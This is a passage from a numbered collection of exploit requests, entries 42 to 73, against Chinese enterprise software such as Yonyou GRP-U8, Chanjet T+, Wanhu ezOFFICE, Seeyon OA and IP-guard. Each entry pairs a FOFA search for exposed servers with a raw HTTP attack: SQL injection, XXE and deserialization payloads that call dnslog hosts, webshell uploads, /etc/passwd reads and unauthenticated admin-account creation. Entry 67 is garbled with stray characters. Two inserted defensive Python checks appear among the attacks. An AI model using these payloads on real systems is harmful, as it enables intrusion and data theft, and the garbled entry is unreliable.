User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the specified string into the specified file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface.
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
The endpoint is the PrimeFaces dynamiccontent.properties.xhtml resource handler; the encrypted EL payload is omitted here (PAYLOAD).
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro Smart management platform (百卓Smart管理平台) importexport.php SQL injection
FOFA:title="Smart管理平台"
The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3 and is executed as-is by the exportexcelbysql action.
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Enter CRM (浙大恩特客户资源管理系统) fileupload.jsp arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
The filename query parameter is used verbatim, so a .jsp name yields a webshell.
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
The page parameter of the flexpaper view.php is passed to a shell; `||` terminates the intended command and runs the echo.
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the file the injected echo wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng management information system (捷诚管理信息系统) CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
Time-based blind: the sId element of the GetOSpById SOAP call is concatenated into SQL; a 5-second delay in the response confirms it.
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate (优卡特) LianAiYun face-recognition all-in-one smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
The addOperators function of SystemMng.ashx is reachable without a session. An HTTP 200 response means the account test123456 / 123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42-43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the MD5 of 102103122 computed by the injected HashBytes call), the target is vulnerable.

" T0 r% M' h% d# ~6 F" {; {67. 万户ezOFFICE wpsservlet任意文件上传8 ]# S5 r; `. j1 c. i. P! n7 n6 \
FOFA:app="万户网络-ezOFFICE"
5 U# @5 h# Q8 AnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
. [) X8 g1 ?* B6 g7 J$ H: _POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
4 H- Q( F8 U. o1 ~9 jHost: x.x.x.x
: o. \: ^" ~' _: zUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.06 p* x/ _9 O2 d1 T: ?* k9 @
Content-Length: 173
7 K& Z; ~% h# i1 V* GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
6 U7 E3 T2 c5 h; Y9 s* c" X" wAccept-Encoding: gzip, deflate3 w/ p% ~2 G* p5 T3 {
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
; s0 Z, `9 T' s/ D  P: X& @6 W2 AConnection: close: _( q* |  T, x& X& k
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
+ \8 L, I/ b" t9 V. XDNT: 1/ P( v0 X2 ^. N9 l: @
Upgrade-Insecure-Requests: 15 N+ C2 A  l8 D! p6 F3 t& \, u
! R3 r$ Z# o# n* ?
--ufuadpxathqvxfqnuyuqaozvseiueerp$ o- R9 l( p7 A& W. B: H
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"! ]3 A1 }8 S" g' @: K  X9 ~
8 j& L8 \) o& }; g8 g
<% out.print("sasdfghjkj");%>: c* h# a  y# q9 X) j
--ufuadpxathqvxfqnuyuqaozvseiueerp--2 S- z( O! v" w1 Z8 v) Q7 j

9 e0 t$ b( ^) r0 C- d; C0 }5 s  y: w
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
) ]5 X) `! {+ e' k: q& H; P# M4 C5 U
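Entries 61, 67 and 80 share one root cause: the client chooses both the directory (dir=../platform/portal/layout/) and the extension (fileType=.jsp, or a .jsp name in filename or report). The validation a save handler needs before it touches the filesystem, as an added example that is not from the original page and not Wanhu's code (the upload root, the extension allow-list and the name pattern are assumptions):

```python
import posixpath
import re

UPLOAD_ROOT = "/srv/ezoffice/upload"      # assumption: the only tree uploads may land in
ALLOWED_EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".png", ".jpg"}  # assumption: no server-executable types
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")  # one plain path component: no '/', '\\', '.', ';' or NUL


def validate_upload(dir_param, name_param, file_type):
    """Map the client-supplied (dir, name, extension) triple to an absolute target path.
    Returns (path, "ok") or (None, reason). Every check runs on the values the server
    would actually use, not on the Content-Disposition filename the client sent."""
    # 1. Extension allow-list. 'fileType=.jsp' fails here whatever the rest looks like.
    ext = file_type.lower()
    if not ext.startswith(".") or ext not in ALLOWED_EXTENSIONS:
        return None, "bad extension"
    # 2. The name must be a single plain component. That rejects 'apoxkq.jsp',
    #    '../x' and the '..;' servlet trick in one go.
    if not NAME_RE.fullmatch(name_param):
        return None, "bad name"
    # 3. The directory must be relative and contain no component carrying '..'
    #    ('..', '..;', '..%2f' after decoding). Deliberately stricter than normpath.
    if dir_param.startswith(("/", "\\")) or "\\" in dir_param or "\x00" in dir_param:
        return None, "bad directory"
    parts = [p for p in dir_param.split("/") if p not in ("", ".")]
    if any(".." in p for p in parts):
        return None, "bad directory"
    # 4. Belt and braces: normalise lexically and confirm we are still under the root.
    target = posixpath.normpath(posixpath.join(UPLOAD_ROOT, *parts, name_param + ext))
    if not target.startswith(UPLOAD_ROOT + "/"):
        return None, "escapes root"
    # On a real server also compare os.path.realpath(target) against the root:
    # a symlink inside the upload tree defeats purely lexical checks.
    return target, "ok"


if __name__ == "__main__":
    for args in (("../platform/portal/layout/", "apoxkq", ".jsp"),
                 ("docs/2024/", "apoxkq", ".pdf")):
        print(args, "->", validate_upload(*args))
```

Note that the order matters: the extension is checked first because it is the cheapest test and the one the page's payloads all fail; rejecting on directory alone would still let a .jsp land inside the upload root if that root is served by the container.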
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
Time-based blind. The ;.js suffix on the path is the usual path-parameter trick for getting a request past an extension-based authentication filter.
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
Time-based blind, same ;.js bypass as entry 68.
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success.aspx command execution
FOFA:app="万户网络-ezEIP"
The SID header is base64: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini. The __VIEWSTATE body is omitted here (PAYLOAD).
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong PM2 project management system (邦永PM2项目管理系统) Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
Time-based blind via the accId parameter of the login page.
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon OA (致远OA) getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
The xmlValue parameter carries a DTD that declares the external entity xxe as file:///c:/windows/win.ini and references it from the VALUE field.
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

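Whatever the server resolves for &xxe; is echoed back in the signature data, so the check a handler for this endpoint needs is to refuse any DTD before parsing rather than to try to parse with entities disabled. Shown below as an added example that is not from the original page and not Seeyon's code, with the form body reconstructed from the entry above (imgvalue dropped, everything else as listed):

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# Constructed copy of the form body from the request above (imgvalue omitted).
SAMPLE_BODY = (
    "S=ajaxColManager&M=colDelLock&signwidth=4.0&signheight=4.0&xmlValue="
    "%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A"
    "++%3C%21ELEMENT+foo+ANY+%3E%0D%0A"
    "++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A"
    "%5D%3E%0D%0A"
    "%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E"
    "%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E"
    "%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E"
)

# Any DOCTYPE or ENTITY declaration is grounds for rejection: the endpoint never needs a DTD.
DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.I)
EXTERNAL_ENTITY_RE = re.compile(r'<!ENTITY\s+(\w+)\s+(?:SYSTEM|PUBLIC)\s+"([^"]*)"', re.I)


def extract_xml(body):
    """Return the decoded xmlValue field of an x-www-form-urlencoded body ('' if absent)."""
    return parse_qs(body, keep_blank_values=True).get("xmlValue", [""])[0]


def external_entities(doc):
    """[(entity_name, system_id)] declared in the document's internal DTD subset.
    Useful for logging what an attacker tried to read."""
    return EXTERNAL_ENTITY_RE.findall(doc)


def parse_signature_xml(doc):
    """Parse the signature XML only if it carries no DTD at all.
    Returns the root element, or None when a DOCTYPE/ENTITY declaration is present."""
    if DTD_RE.search(doc):
        return None
    return ET.fromstring(doc)


def field_values(root):
    """{Index: text} for every element carrying an Index attribute, i.e. the data
    the endpoint actually consumes (ProtectItem, Caption, ID, VALUE)."""
    return {el.get("Index"): (el.text or "") for el in root.iter() if el.get("Index")}


if __name__ == "__main__":
    doc = extract_xml(SAMPLE_BODY)
    print("rejected" if parse_signature_xml(doc) is None else "accepted",
          "external entities:", external_entities(doc))
```

The regex guard runs on the raw text before any XML library sees it, which also covers parsers whose "disable external entities" switches are easy to misconfigure; once a document has passed it, ElementTree can parse it normally.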
73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
